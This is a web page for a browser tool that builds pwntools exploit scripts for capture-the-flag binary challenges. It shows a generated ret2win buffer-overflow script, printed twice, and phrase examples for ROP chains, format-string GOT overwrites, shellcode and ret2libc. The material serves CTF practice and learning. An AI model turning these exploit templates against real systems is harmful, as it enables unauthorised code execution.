Tools / Pwntools Forge

Pwntools Forge: pwntools Script Generator

Compose any pwntools script from typed step blocks, type a phrase in the natural-language bar to add a step, or load a preset starting point and edit from there. Every block has its own form, and the script regenerates as you go. Copy or download the .py file when you're ready.

Historyautosaved locally · Ctrl+Z to undo · Ctrl+Shift+Z to redo

Connection

Minimal mode (terse, hand-written look)

Local binary pathArchitecture

libc path (optional)Remote hostRemote portConnection variable nameReal CTF scripts often use `p` or `r` instead of `io`.

or drag & drop here. Auto-fills arch and reports checksec hints. Nothing leaves your browser.

Run with python3 solve.py for local,REMOTE=1 for remote,GDB=1 for gdb.

Preset starting points

Loading a preset replaces the current step list. Edit/reorder/delete the resulting blocks freely. (Set a libc path to enable the post-leak stage of ret2libc.)

Natural-language step

describe a step, or paste a phrase

Phrase examples (click to expand)

wait for > / recv until "Enter your name:"
recv line as response / recv 32 bytes as buf
send AAAA / sendline payload
overflow at offset 40 to win / overflow 72 with rop.chain()
cyclic 200 / cyclic_find 0x6161616161616168
rop chain to system / rop chain to win
fmtstr offset 6 / format string at offset 8 target exe.got["printf"] with exe.symbols["win"]
shellcode / spawn shell
leak as puts_leak / u64 from response as leak
libc base from leak via puts
log success: pwned! / set OFFSET = 40
interactive / close / sleep 1.5
section: stage 2 ret2system / # this is a comment / py: io.recv(timeout=1)

Generated scriptsolve.py49 lines

#!/usr/bin/env python3
from pwn import *

# ────────────────────────────────────────────────────────────
# Configuration
# ────────────────────────────────────────────────────────────
exe = ELF("./vuln", checksec=False)
context.binary = exe
context.arch = "amd64"
context.terminal = ["tmux", "splitw", "-h"]

HOST = "saturn.picoctf.net"
PORT = 0

GDBSCRIPT = """
# break *main
continue
"""

def conn():
    if args.REMOTE:
        return remote(HOST, PORT)
    if args.GDB:
        return gdb.debug(exe.path, gdbscript=GDBSCRIPT)
    return process(exe.path)

# ────────────────────────────────────────────────────────────
# Exploit
# ────────────────────────────────────────────────────────────
io = conn()

# ────────────────────────────────────────────────────────────
# Ret2win
# ────────────────────────────────────────────────────────────

OFFSET = 40

WIN = exe.symbols["win"]

RET = next(exe.search(asm("ret"), executable=True))

payload = flat({
    OFFSET: [RET, WIN],  # 16-byte aligned
})

io.sendlineafter(b"> ", payload)

io.interactive()

#!/usr/bin/env python3
from pwn import *

# ────────────────────────────────────────────────────────────
# Configuration
# ────────────────────────────────────────────────────────────
exe = ELF("./vuln", checksec=False)
context.binary = exe
context.arch = "amd64"
context.terminal = ["tmux", "splitw", "-h"]

HOST = "saturn.picoctf.net"
PORT = 0

GDBSCRIPT = """
# break *main
continue
"""

def conn():
    if args.REMOTE:
        return remote(HOST, PORT)
    if args.GDB:
        return gdb.debug(exe.path, gdbscript=GDBSCRIPT)
    return process(exe.path)

# ────────────────────────────────────────────────────────────
# Exploit
# ────────────────────────────────────────────────────────────
io = conn()

# ────────────────────────────────────────────────────────────
# Ret2win
# ────────────────────────────────────────────────────────────

OFFSET = 40

WIN = exe.symbols["win"]

RET = next(exe.search(asm("ret"), executable=True))

payload = flat({
    OFFSET: [RET, WIN],  # 16-byte aligned
})

io.sendlineafter(b"> ", payload)

io.interactive()

Steps (7)

⋮⋮01Section headingRet2win

Why this step?

Visual divider with a title comment.

Section titleNotes (becomes a Python comment above this step)

Generated Python (3 lines)

# ────────────────────────────────────────────────────────────
# Ret2win
# ────────────────────────────────────────────────────────────

⋮⋮02Set variableOFFSET = 40

Why this step?

name = expression

Variable nameExpression

Notes (becomes a Python comment above this step)

Generated Python (1 line)

OFFSET = 40

⋮⋮03Set variableWIN = exe.symbols["win"]

Why this step?

name = expression

Variable nameExpression

Notes (becomes a Python comment above this step)

Generated Python (1 line)

WIN = exe.symbols["win"]

⋮⋮04Set variableRET = next(exe.search(asm("ret"), executable=True))

Why this step?

name = expression

Variable nameExpression

Notes (becomes a Python comment above this step)

Generated Python (1 line)

RET = next(exe.search(asm("ret"), executable=True))

⋮⋮05Flat payloadpayload = flat({…1 row})

Why this step?

flat({offset: [...]}) with offset rows pwntools docs ↗

Variable nameFiller byte (optional)Default offset (used when adding rows; informational)

OffsetPayload (expression)Comment

Notes (becomes a Python comment above this step)

Generated Python (3 lines)

payload = flat({
    OFFSET: [RET, WIN],  # 16-byte aligned
})

⋮⋮06Send aftersendlineafter payload after >

Why this step?

io.sendafter / io.sendlineafter pwntools docs ↗

Mode

Wait for (literal text)Then send (variable / literal / expression)

Notes (becomes a Python comment above this step)

Generated Python (1 line)

io.sendlineafter(b"> ", payload)

⋮⋮07Interactive shellio.interactive()

Why this step?

io.interactive()

No options.

Notes (becomes a Python comment above this step)

Generated Python (1 line)

io.interactive()

Step blocks

A script is a list of typed blocks emitted in order under a fixed connection header. Reorder, duplicate, or delete blocks. Each block shows its generated Python below the form so you can see the diff as you edit.

Structure

section heading, comment, raw Python (escape hatch), log.info / success / warning / error / debug, set variable.

I/O

recv until needle, recv line (with .strip()), recv N bytes, send / sendline, sendafter / sendlineafter.

Payloads

cyclic(N), cyclic_find offset, flat({...}) row builder, ROP chain (call / raw / find_gadget / dump), fmtstr_payload, shellcode (shellcraft / asm / raw hex).

Post-leak

parse u32 / u64 leak from a recv'd expression, set libc.address from a known symbol leak.

Control

time.sleep, io.interactive(), io.close().

How it works

Everything runs in your browser. Each step block is a typed object; pure functions emit Python lines from the block's form values. The natural-language bar accepts phrases like wait for >, overflow at offset 40 to win, rop chain to system, leak as puts_leak, and interactive map to the right block automatically. Anything that doesn't match a matcher is added as a comment so you never lose the phrase.

Presets aren't exclusive templates: they populate the canvas with a starter list of blocks for ret2win, shellcode, ret2libc, ROP, format string, or cyclic offset finding. Edit, reorder, or mix and match freely.

The script is in sync with the canvas until you edit the textarea directly: an edited tag appears and the canvas stops overwriting your work until you click Reset to generated.

Run the saved file with python3 solve.py for local. Add REMOTE=1 to hit the deployed instance, or GDB=1 to drop into gdb at the breakpoint inside GDBSCRIPT.